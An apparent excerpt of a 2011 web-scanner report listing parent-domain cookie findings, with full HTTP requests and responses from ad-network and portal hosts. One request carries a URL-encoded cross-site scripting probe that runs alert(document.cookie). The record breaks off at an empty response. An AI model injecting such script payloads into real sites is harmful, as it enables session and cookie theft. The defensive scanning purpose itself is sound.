GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://c Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 18:08:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Date: Sun, 30 Jan 2011 18:08:30 GMT Connection: close Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://c">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=izJRNJpwIg02FQFCdbdBUhwUwXAVI8Y4FQFCYTeBUhQ3gZAVIQTnGQFCF2pBUhAohXAVIYZ4FQFCKGeBUhwohXAVIca4FQFCiGeBUhQshXAVwOYAM/oxqI7YCwAoGJ1r1RQcKaEOGK2AI9YxxN53EkL3FkzgPXw6TVQXsumB/0mhqca7HIaWGeQrMew41ZMFkq1B6bjhUq6bDwWZGJ7r4jQsMa4LwaHCW8ohv0I9IsfzFEzsNiQQoaAV; F1=B0OnE1EBAAAABAAAAQAAABA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuiy4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q240Mxxgzq7NHhPfc3j1yoZKJiMdPbC8fCEdd30GSObC6lkwnqVseu4g1vniv3XYjqYjceyxkwf2tMZSArEQlir5SS2/75sJgaoYVesLytCxbvY9DUCszhatMCKKwTxRIWF+0xTPXT252NsY5JKsYLPWTZUUAXm9JaMAw20vf/mP2cRTHaOgTEMLuyHJXb5Jy8EkMSABMBHiu8OMTbFF6Xd8eJ5ajIEo7MWwYYM2j4u/xo2g3M8yNIsgpaMiSPRegy+4TZaJX30vjsTyS3GGK9P94DueQl+0oOsMvcs3UfJHgL6pNMJ9Bbex1jgMttsrIbsgzmOICEVCga7PcFY4BTH+j6pLnQtbzK/VM!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.950192.730461.0XMC Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 01:29:43 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 593 Date: Sun, 30 Jan 2011 01:29:43 GMT Connection: close Vary: Accept-Encoding Set-Cookie: C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:34 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 40767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /OmRedir.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:42 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 7348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http:// ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:38 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /slideshow.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:37 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA15 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 50044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: redtape.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:18:21 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 65847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 30 Jan 2011 01:37:06 GMT Connection: close Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: search.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 0 Location: http://www.bing.com/ P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-Akamai-TestID: eb356f92ec934ef7abb977318c2c1fa7 Expires: Sun, 30 Jan 2011 01:37:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 30 Jan 2011 01:37:08 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296351428; domain=.redacted; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
mkt=ep=en-US; domain=.live.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /LoginStage.aspx HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cirf=http%3A%2F%2Fwww.reimage.com%2Flp%2Fnhome%2Findex.php%3Ftracking%3DNeudesic69f18%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E602f708c63d%26banner%3D%26banner%3D728x90-1%5C%26adgroup%3Ddirect%26ads_name%3Ddirect%26keyword%3Ddirect&ciprf=http%3A%2F%2Fburp%2Fshow%2F9 HTTP/1.1 Host: seg.admailtiser.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737&cru=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3d1033%26id%3d251248%26cbcxt%3dhom%26mkt%3den-US HTTP/1.1 Host: signup.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Fru%3Dhttp%253a%252f%252fmail.live.com%252f%253frru%253dinbox%26wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3D1033%26id%3D251248%26cbcxt%3Dhom%26mkt%3Den-US%26bk%3D1296342737%26cru%3Dhttps:%2F%2Flogin.live.com%2Flogin.srf%253fwa%253dwsignin1.0%2526rpsnv%253d11%2526rver%253d6.1.6206.0%2526wp%253dMBI%2526wreply%253dhttp:%25252F%25252Fmail.live.com%25252F%25253Frru%25253Dhome%252526livecom%25253D1%2526lc%253d1033%2526id%253d251248%2526cbcxt%253dhom%2526mkt%253den-US%26lic%3D1&lc=1033&id=68692 Server: Microsoft-IIS/7.0 Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/; secure Set-Cookie: xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure Set-Cookie: xidseq=1; domain=.live.com; path=/; secure Set-Cookie: mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/; secure Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:58 GMT; path=/; secure X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Date: Sat, 29 Jan 2011 23:13:57 GMT Connection: close Content-Length: 919
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signup.aspx HTTP/1.1 Host: signup.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342837&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Flic%3D1&lc=1033&id=68692 Server: Microsoft-IIS/7.0 Set-Cookie: ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly Set-Cookie: xid=edb93499-9e17-4a85-b8d1-8d8140696b6f&&CO1xxxxxxC107&61; domain=.live.com; path=/; secure Set-Cookie: xidseq=1; domain=.live.com; path=/; secure Set-Cookie: mktstate=S=-1109498027&U=&E=&P=&B=en; domain=.live.com; path=/; secure Set-Cookie: mkt1=norm=en; domain=.live.com; path=/; secure Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:57 GMT; path=/; secure X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Date: Sat, 29 Jan 2011 23:13:57 GMT Connection: close Content-Length: 331
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342837&rver=6.1.6206.0&w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bloglist.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:49 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
